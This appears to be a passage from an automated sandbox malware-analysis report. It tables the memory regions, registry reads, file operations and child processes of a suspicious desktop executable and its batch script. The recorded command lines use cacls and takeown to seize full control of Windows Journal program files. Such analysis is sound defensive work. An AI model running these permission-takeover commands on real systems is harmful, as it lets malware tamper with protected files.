| private_0x00000000003b0000 | 0x003b0000 | 0x003b1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x003c0000 | 0x0047dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x00480fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000490000 | 0x00490000 | 0x00490fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0065ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x009b0000 | 0x00ce6fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f9b0000 | 0x7f9b0000 | 0x7faaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007fab0000 | 0x7fab0000 | 0x7fad2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007fad5000 | 0x7fad5000 | 0x7fad7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fad8000 | 0x7fad8000 | 0x7fad8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fadb000 | 0x7fadb000 | 0x7fadbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007fadd000 | 0x7fadd000 | 0x7fadffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #152: cmd.exe
290
0
| Information | Value |
|---|---|
| ID | #152 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xec8 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D6C
0x
634
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ce0000 | 0x00ce0000 | 0x04cdffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ce0000 | 0x04ce0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ce0000 | 0x04ce0000 | 0x04ceffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004cf0000 | 0x04cf0000 | 0x04cf3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d01fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04d03fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004d10000 | 0x04d10000 | 0x04d23fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004d30000 | 0x04d30000 | 0x04d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d70000 | 0x04d70000 | 0x04e6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004e70000 | 0x04e70000 | 0x04e73fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004e80000 | 0x04e80000 | 0x04e80fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004e90000 | 0x04e90000 | 0x04e91fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04ea0000 | 0x04f5dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x04f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x0516ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f80000 | 0x04f80000 | 0x04fbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x0516ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005170000 | 0x05170000 | 0x0526ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005270000 | 0x05270000 | 0x0533ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05340000 | 0x05676fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed20000 | 0x7ed20000 | 0x7ee1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee20000 | 0x7ee20000 | 0x7ee42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee48000 | 0x7ee48000 | 0x7ee4afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4b000 | 0x7ee4b000 | 0x7ee4dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4e000 | 0x7ee4e000 | 0x7ee4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4f000 | 0x7ee4f000 | 0x7ee4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (217)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
32 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
107 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
12 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 60 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 248, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (3)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xb38, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0xf40, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "PDIALOG.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "PDIALOG.exe.mui" |
|
1 |
Process #154: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #154 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\blank.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:55, Reason: Child Process |
| Unmonitor | End Time: 00:03:07, Reason: Self Terminated |
| Monitor Duration | 00:00:12 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xec4 |
| Parent PID | 0x464 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A0C
0x
E1C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000c50000 | 0x00c50000 | 0x00c6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c50000 | 0x00c50000 | 0x00c5ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000c60000 | 0x00c60000 | 0x00c63fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00c71fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000c70000 | 0x00c70000 | 0x00c73fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000c80000 | 0x00c80000 | 0x00c93fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000ca0000 | 0x00ca0000 | 0x00cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000ce0000 | 0x00ce0000 | 0x00d1ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000d20000 | 0x00d20000 | 0x00d23fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000d30000 | 0x00d30000 | 0x00d30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000d40000 | 0x00d40000 | 0x00d41fff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00d50000 | 0x00d51fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000d60000 | 0x00d60000 | 0x00d6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000d70000 | 0x00d70000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00d70000 | 0x00e2dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000e30000 | 0x00e30000 | 0x00e6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e70000 | 0x00e70000 | 0x00eaffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000f10000 | 0x00f10000 | 0x0100ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000005050000 | 0x05050000 | 0x051affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x051b0000 | 0x054e6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eec0000 | 0x7eec0000 | 0x7efbffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007efc0000 | 0x7efc0000 | 0x7efe2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efe6000 | 0x7efe6000 | 0x7efe8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe9000 | 0x7efe9000 | 0x7efe9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efec000 | 0x7efec000 | 0x7efecfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efed000 | 0x7efed000 | 0x7efeffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #156: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #156 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\To_Do_List.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:58, Reason: Child Process |
| Unmonitor | End Time: 00:03:09, Reason: Self Terminated |
| Monitor Duration | 00:00:11 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xedc |
| Parent PID | 0x51c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B68
0x
81C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000007f0000 | 0x007f0000 | 0x0080ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x007fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000800000 | 0x00800000 | 0x00803fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x00811fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x00813fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x00833fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000840000 | 0x00840000 | 0x0087ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000880000 | 0x00880000 | 0x008bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000008c0000 | 0x008c0000 | 0x008c3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x008d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008e0000 | 0x008e0000 | 0x008e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000008f0000 | 0x008f0000 | 0x0092ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00930000 | 0x00931fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000950000 | 0x00950000 | 0x0095ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000960000 | 0x00960000 | 0x00a5ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00a60000 | 0x00b1dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000b20000 | 0x00b20000 | 0x00b5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000b60000 | 0x00b60000 | 0x00d2ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05050000 | 0x05386fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ebe0000 | 0x7ebe0000 | 0x7ecdffff | Pagefile Backed Memory | r |
|
|
|
- |
